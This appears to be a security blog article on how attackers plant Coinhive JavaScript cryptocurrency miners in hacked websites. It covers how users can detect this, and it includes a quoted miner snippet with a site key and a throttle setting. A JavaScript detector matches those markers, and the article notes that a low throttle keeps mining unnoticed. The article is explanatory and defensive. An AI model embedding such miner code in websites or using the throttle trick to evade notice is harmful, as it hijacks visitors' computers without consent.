Exploitation of websites for cryptocurrency mining

Exploitation of hacked websites for cryptocurrency mining gains popularity

Exploitation of hacked websites for cryptocurrency mining is a new thing, and it gets more popular day by day. Hacking websites for fun or for other reasons, such as spamming and other exploitation, is a thing of the past. All previous methods of exploiting hacked sites are outdated, have low profit margins (except stealing CC credentials and similar data) and are incompatible with modern trends. Now everyone wants cryptocurrencies, everyone is obsessed with crypto money, and everyone is ready to do anything to get it.

Coinhive JavaScript miner for the Monero Blockchain

Coinhive offers a JavaScript that anyone can easily embed in a website. This JavaScript is a Monero Blockchain miner that uses the CPU power of the website visitor's PC for predefined calculations. Your PC turns into a cryptocurrency mining machine when you visit a website equipped with the Coinhive JavaScript miner.

Exploitation efficiency with Coinhive JavaScript

Coinhive declares that their JavaScript has 65% of the performance of a native miner. Besides, mining with a CPU is not as efficient as mining with a GPU, and certainly not as efficient as mining cryptocurrencies with ASIC (application-specific integrated circuit) miners. There are more problems related to the efficiency of mining in browsers.

Mining requires time. More time means more calculations and more hashing done. Only some specific sites can offer extended visitor sessions, for example, websites that allow their users to watch movies online. Mining on more than one site at once also increases the exploiting rate, and this has recently been a source of great interest to hackers.

Coinhive has changed the behavior of hackers

Coinhive has fundamentally changed the objectives of some hacker attacks. Not so long ago, hackers used their knowledge and skills to hack websites for fun (website defacing, leaving their hacker signatures) or profit (spam, SEO spam, pharma spam or even stealing credit card credentials). But now everything has suddenly changed: they try to work without leaving a trace of their activity, and the only thing they want to leave is the Coinhive JavaScript running unattended on a hacked website.

Exploitation of previously hacked websites

There are signs that some hackers repeat their intrusion into previously hacked websites to remove any proof of the hack and leave the site entirely functional but now equipped with cryptocurrency mining software. As I mentioned before, mining requires time, but mining code spread across tens, hundreds or even thousands of websites adds up to quite a powerful mining network, and this opportunity is attractive to hackers.

For anyone who owns a website with average traffic, Coinhive could be uninteresting; besides, it involves the risk of losing some of the audience due to a ruined user experience if throttling is set to a high level. But a hacker who runs the miner on a dozen websites can achieve a sufficient mining rate virtually without any risk.

Since it’s hard to trace cryptocurrencies and owners of cryptocurrency wallets, all this stuff sounds like an endless Christmas for hackers.

How to identify and what to look for in the source code

The easiest way to identify that your PC is doing something more than usual is to pay attention to its performance. Cryptocurrency mining requires a lot of calculation power, which means your PC's CPU performance for other normal operations will decrease. In other words, your computer will be slower.

Another pretty good measure is to pay attention to how the computer tries to cool itself down. A lot of calculations require more electricity and generate far more heat. If your CPU fan or fans suddenly start to work at full throttle just a few seconds after a particular site has loaded, it is likely that you are already running a Coinhive or similar miner in your browser.

Here’s an example: a PC with an Intel i7 quad-core processor exploited for mining by the Coinhive JavaScript. The graph shows idle load, and then the load suddenly increases when I open the “piratebay247.net” website.

Coinhive mining graph - exploitation of CPU power

To hide the presence of this JavaScript, it is possible to adjust the throttling parameter. Lower throttle means fewer calculations and almost unnoticeable load on the CPU. In other words, mining is less aggressive and less profitable, but at the same time less noticeable.

When it is impossible to determine unwanted mining operations from the behavior of the computer's processor (slower system, higher load, and need for additional cooling), you can always check the source code of the suspicious site. Below you can see an example of part of the source code found on the “piratebay247.net” website. Here you can see an embedded coinhive.min.js JavaScript with a throttle set to 0.5, which means less aggressive mining.

<script type="text/javascript" src="/fuckadblock.js"></script>
<script>!function(){for(var o,e=function(){},n=["assert","clear","count","debug","dir","dirxml","error","exception","group","groupCollapsed","groupEnd","info","log","markTimeline","profile","profileEnd","table","time","timeEnd","timeStamp","trace","warn"],r=n.length,i=window.console=window.console||{};r--;)o=n[r],i[o]||(i[o]=e)}();</script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('OT1CIcpkIOCO7yVMxcJiqmSWoDWOri06', { throttle: 0.5 });
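
The two markers visible in that excerpt, the coinhive.min.js include and the CoinHive.Anonymous constructor with its throttle option, can be searched for automatically in a page's source. The check below is an added example, not code from the original article or from Coinhive; the function name, the sample markup and the site key in it are constructed for illustration.

```javascript
// Added example: flag Coinhive-style miner markers in a page's HTML source.
// Sample markup and the site key below are constructed placeholders.

// <script> tags that carry a src attribute (single or double quoted).
const SCRIPT_SRC = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
// Miner construction as in the excerpt: new CoinHive.Anonymous('KEY', {...})
const MINER_CTOR = /new\s+CoinHive\.(\w+)\s*\(\s*["']([^"']+)["']([^)]*)\)/g;
const THROTTLE = /throttle\s*:\s*([0-9]*\.?[0-9]+)/;

function findMinerIndicators(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_SRC)) {
    const src = m[1];
    // The hosted library, or a self-hosted copy that kept its file name.
    const hosted = /(^|\/\/)([\w-]+\.)*coinhive\.com\//i.test(src);
    const copied = /coinhive(\.min)?\.js(\?|$)/i.test(src);
    if (hosted || copied) findings.push({ type: 'library', value: src });
  }
  for (const m of html.matchAll(MINER_CTOR)) {
    const t = THROTTLE.exec(m[3]);
    findings.push({
      type: 'miner',
      value: m[1],                        // constructor name, e.g. "Anonymous"
      siteKey: m[2],                      // account the mined hashes are credited to
      throttle: t ? Number(t[1]) : null,  // null when no throttle option is set
    });
  }
  return findings;
}

// Constructed sample shaped like the excerpt above.
const SAMPLE = [
  '<script src="/js/jquery.min.js"></script>',
  '<script src="https://coinhive.com/lib/coinhive.min.js"></script>',
  '<script>',
  "  var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY', { throttle: 0.5 });",
  '</script>',
].join('\n');

// Constructed page that only mentions the name in its text.
const CLEAN = '<script src="/js/app.js"></script><p>coinhive is discussed here</p>';

console.log(findMinerIndicators(SAMPLE));
```

Plain string matching only catches loaders that keep these names; for a renamed or obfuscated script, the CPU-load check described earlier remains the fallback.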

And finally, there are now dozens of browser extensions that can block the Coinhive JavaScript automatically. Moreover, some antivirus and antimalware programs are actively blocking Coinhive and other mining software.

Proof of Work Captcha

There are more friendly ways to use the Coinhive JavaScript, and they offer their JavaScript as an alternative CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart). The main idea is to determine the user type (human or machine) by forcing it to make some mining calculations.

Well, this may sound nice, but I doubt that it is designed purely as a challenge-response test and is capable of reliably determining the user type. Anyway, if it is used only as a CAPTCHA, then why not, but I tried this Proof of Work Captcha on an old and slow PC, and it required a lot of time, so users with slower PCs will get a poor user experience.

On the other hand, if this “Proof of Work Captcha” can protect websites from brute force attacks or spamming by using the CPU resources of the attacker's PC to generate you some cash, you might be interested in this CAPTCHA alternative.

To conclude, I would say that Coinhive made a perfect tool for hackers to exploit hacked websites. I don’t think that this JavaScript will be popular among the developers of reliable and well-known sites. Even with low throttling, it ruins the user experience for a virtually small profit, and there are several articles about the efficiency of a Coinhive miner in comparison with unintrusive ads. Ads generate more money and do not cause any suspicion or inconvenience to users. But for those who can exploit others’ websites, and especially a large number of sites, this JavaScript is a real gold mine.
